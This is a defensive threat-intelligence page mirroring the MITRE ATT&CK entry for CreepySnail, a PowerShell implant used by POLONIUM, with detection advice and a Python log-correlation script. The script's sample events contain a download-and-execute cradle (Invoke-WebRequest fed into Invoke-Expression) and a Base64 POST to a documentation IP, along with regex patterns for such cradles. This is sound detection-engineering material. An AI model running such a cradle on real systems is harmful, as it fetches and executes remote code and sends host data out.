S1024: CreepySnail
CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.[1]
Analyst context for executives and security teams
CreepySnail matters because it is a custom Windows PowerShell implant, not a commodity tool with a predictable product signature. MITRE reports it has been used by POLONIUM since at least 2022. For leaders, the practical issue is whether the organization can see PowerShell-based execution, discovery activity, domain account abuse, and web-based command-and-control patterns well enough to make fast incident decisions.
Executive priority
Prioritize this as a validation case for Windows endpoint visibility, identity monitoring, and outbound web traffic governance. The relationship set ties CreepySnail to discovery, PowerShell execution, domain account abuse, C2 over web protocols, standard encoding, and exfiltration over the C2 channel. Executives should ask whether SOC and IR teams can prove coverage for those behaviors, especially where business-critical Windows systems, domain accounts, sensitive data, or regulated environments are involved.
Technical view
MITRE provides no dedicated detection text for CreepySnail, so defenders should build coverage from the linked behaviors: T1059.001 PowerShell execution, T1033 user discovery, T1016 network configuration discovery, T1078.002 domain account abuse, T1071.001 web-protocol C2, T1132.001 standard encoding, and T1041 exfiltration over an existing C2 channel. Validate that Windows endpoint logs capture PowerShell process and script activity, that identity telemetry can show unusual domain account use, and that network telemetry can support investigation of suspicious HTTP/S communications and encoded payload patterns without relying on a single indicator.
Likely telemetry
- Windows endpoint process creation telemetry, especially powershell.exe or PowerShell host activity
- PowerShell script block, module, and command-line logging where enabled
- Windows security and authentication logs for domain account use
- Directory service or identity-provider telemetry for abnormal domain account behavior
- Endpoint evidence of user and system/network discovery commands
Detection direction
- Because official detection guidance is not provided, map detections to the related ATT&CK techniques rather than to the malware name alone.
- Tune PowerShell analytics for suspicious command lines, encoded content, remote execution patterns, and discovery commands, while accounting for legitimate administration scripts.
- Correlate discovery activity with subsequent outbound web traffic and domain account activity to reduce false positives from normal IT operations.
- Validate whether logs preserve enough command-line, script, user, host, destination, and timing context for incident reconstruction.
- Review blind spots around unmanaged Windows hosts, disabled PowerShell logging, limited proxy visibility, and service accounts with broad domain privileges.
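As an added illustration of the detection direction above (example code written for this page, not MITRE's, Glexia's, or anything taken from CreepySnail itself), the following Python script runs a small behavior-cluster triage over constructed sample Script Block Logging events and proxy records. It treats the cmdlets named in the techniques table (`getmac`, `Get-NetIPAddress`, `Invoke-WebRequest`, `Invoke-Expression`, Base64 handling) as weak single signals and only raises severity when a download-and-execute cradle is followed by outbound web traffic from the same host and user, which is what keeps an administrator's plain installer download from alerting. The event field names, the five-minute join window, the hostnames, the `CORP` domain and the documentation IP address are all assumptions of this example.

```python
"""Behavior-based triage for the CreepySnail technique cluster (example only).

Joins PowerShell Script Block Logging events (Event ID 4104 style) with
outbound web-proxy records so that discovery, download cradles, Base64
handling and follow-on web traffic are surfaced together, not as isolated alerts.
"""
import base64
import re
from datetime import datetime, timedelta

# Constructed sample Script Block Logging records. The field names are this
# example's own simplification of 4104 events, not a product schema.
SCRIPT_BLOCKS = [
    {"time": "2024-05-01T09:00:05", "host": "WS01", "user": "CORP\\jdoe",
     "text": "Get-ChildItem C:\\Reports | Measure-Object"},
    {"time": "2024-05-01T09:01:10", "host": "WS02", "user": "CORP\\svc-backup",
     "text": "$u=[System.Environment]::UserName; getmac; Get-NetIPAddress"},
    {"time": "2024-05-01T09:01:40", "host": "WS02", "user": "CORP\\svc-backup",
     "text": ("$r=Invoke-WebRequest -Uri http://198.51.100.10/p -UseBasicParsing; "
              "Invoke-Expression ([Text.Encoding]::UTF8.GetString("
              "[Convert]::FromBase64String($r.Content)))")},
    # Legitimate administration: a download to disk without dynamic execution.
    {"time": "2024-05-01T11:00:00", "host": "WS03", "user": "CORP\\admin",
     "text": "Invoke-WebRequest -Uri https://updates.example.internal/agent.msi "
             "-OutFile C:\\Temp\\agent.msi"},
]

# Constructed proxy records (198.51.100.10 is a documentation address).
PROXY_LOG = [
    {"time": "2024-05-01T09:01:41", "host": "WS02", "user": "CORP\\svc-backup",
     "method": "POST", "url": "http://198.51.100.10/p",
     "body_sample": base64.b64encode(b"host=WS02;user=svc-backup").decode()},
    {"time": "2024-05-01T11:00:02", "host": "WS03", "user": "CORP\\admin",
     "method": "GET", "url": "https://updates.example.internal/agent.msi",
     "body_sample": ""},
]

# Single-technique indicators; each alone is weak evidence.
RULES = {
    "T1033": re.compile(r"whoami|getusername|Environment\]::UserName|\$env:USERNAME", re.I),
    "T1016": re.compile(r"\bgetmac\b|Get-NetIPAddress|\bipconfig\b", re.I),
    "T1132.001": re.compile(r"FromBase64String|-EncodedCommand|-enc\b", re.I),
}
DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString", re.I)
EXECUTE = re.compile(r"Invoke-Expression|\biex\b", re.I)


def classify_block(text):
    """Return the set of technique IDs a single script block matches."""
    hits = {tid for tid, rx in RULES.items() if rx.search(text)}
    # A remote fetch feeding dynamic execution in one block is the download
    # cradle; a fetch alone (e.g. an installer saved to disk) is not flagged.
    if DOWNLOAD.search(text) and EXECUTE.search(text):
        hits.add("T1059.001")
    return hits


def decodes_as_text(sample):
    """True if sample is strict Base64 whose decoded bytes are printable ASCII."""
    try:
        raw = base64.b64decode(sample, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return bool(raw) and all(32 <= b < 127 for b in raw)


def correlate(script_blocks, proxy_log, window_minutes=5):
    """Group flagged blocks by (host, user), attach web traffic that follows
    them within the window, and return one finding per principal."""
    findings = {}
    for ev in script_blocks:
        hits = classify_block(ev["text"])
        if not hits:
            continue
        f = findings.setdefault((ev["host"], ev["user"]), {
            "host": ev["host"], "user": ev["user"],
            "techniques": set(), "c2_candidates": []})
        f["techniques"] |= hits
        t0 = datetime.fromisoformat(ev["time"])
        for req in proxy_log:
            if (req["host"], req["user"]) != (ev["host"], ev["user"]):
                continue
            delta = datetime.fromisoformat(req["time"]) - t0
            if not timedelta(0) <= delta <= timedelta(minutes=window_minutes):
                continue
            f["techniques"].add("T1071.001")
            if req["url"] not in f["c2_candidates"]:
                f["c2_candidates"].append(req["url"])
            # A POST carrying Base64 that decodes to text right after the
            # cradle is the pattern worth treating as possible exfiltration.
            if req["method"] == "POST" and decodes_as_text(req["body_sample"]):
                f["techniques"].add("T1041")
    for f in findings.values():
        cradle_and_c2 = {"T1059.001", "T1071.001"} <= f["techniques"]
        f["severity"] = "high" if cradle_and_c2 else "medium"
    return list(findings.values())


if __name__ == "__main__":
    for finding in correlate(SCRIPT_BLOCKS, PROXY_LOG):
        print(finding["severity"], finding["host"], finding["user"],
              sorted(finding["techniques"]), finding["c2_candidates"])
```

On the sample data only the WS02 service account is reported, with the discovery, cradle, encoding, web C2 and possible-exfiltration techniques joined into one high-severity finding; the WS03 installer download produces nothing, which is the false-positive behaviour the list above asks for. In a real deployment the regexes would be replaced by the SIEM's PowerShell analytics and the join by a query across endpoint, identity and proxy sources, but the shape of the correlation is the same.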
Mitigation priorities
- Harden PowerShell use through least privilege, logging, constrained administration practices, and control of unnecessary script execution where operationally feasible.
- Strengthen domain account controls with least privilege, privileged access separation, service account review, and monitoring for abnormal use.
- Improve egress governance for web protocols by ensuring outbound traffic is logged, filtered where appropriate, and attributable to users and hosts.
- Prepare IR playbooks that connect endpoint PowerShell evidence, identity activity, and web traffic investigation into a single workflow.
- Use vulnerability and compliance programs to confirm that critical Windows assets have required logging, endpoint protection, and retention needed to support investigation.
Analyst notes and limits
The most useful defensive takeaway is not a malware signature; it is the behavior cluster around PowerShell, discovery, domain account use, web-based C2, encoding, and possible exfiltration over the same channel. This object is especially relevant for teams testing whether endpoint, identity, and network telemetry can be joined quickly during an investigation.
The supplied ATT&CK object has no official detection text, no aliases, and no malware-level tactics listed. Platform support is limited to Windows for the malware object, although some related techniques list broader platforms. Local environment evidence is required to determine exposure, detection coverage, or whether any activity is present.
CreepySnail
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1078.002 | Domain Accounts (sub-technique) | CreepySnail can use stolen credentials to authenticate on target networks.[1] |
| Enterprise | T1071.001 | Web Protocols (sub-technique) | CreepySnail can use HTTP for C2.[1] |
| Enterprise | T1016 | System Network Configuration Discovery | CreepySnail can use `getmac` and `Get-NetIPAddress` to enumerate network settings.[1] |
| Enterprise | T1132.001 | Standard Encoding (sub-technique) | CreepySnail can use Base64 to encode its C2 traffic.[1] |
| Enterprise | T1059.001 | PowerShell (sub-technique) | CreepySnail can use PowerShell for execution, including the cmdlets `Invoke-WebRequest` and `Invoke-Expression`.[1] |
| Enterprise | T1041 | Exfiltration Over C2 Channel | CreepySnail can connect to C2 for data exfiltration.[1] |
| Enterprise | T1033 | System Owner/User Discovery | CreepySnail can execute `getUsername` on compromised systems.[1] |
Groups, software, and campaigns
G1005: POLONIUM
POLONIUM is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess POLONIUM has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | b9504701c435… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Microsoft POLONIUM June 2022. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
[2] mitre-attack S1024.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.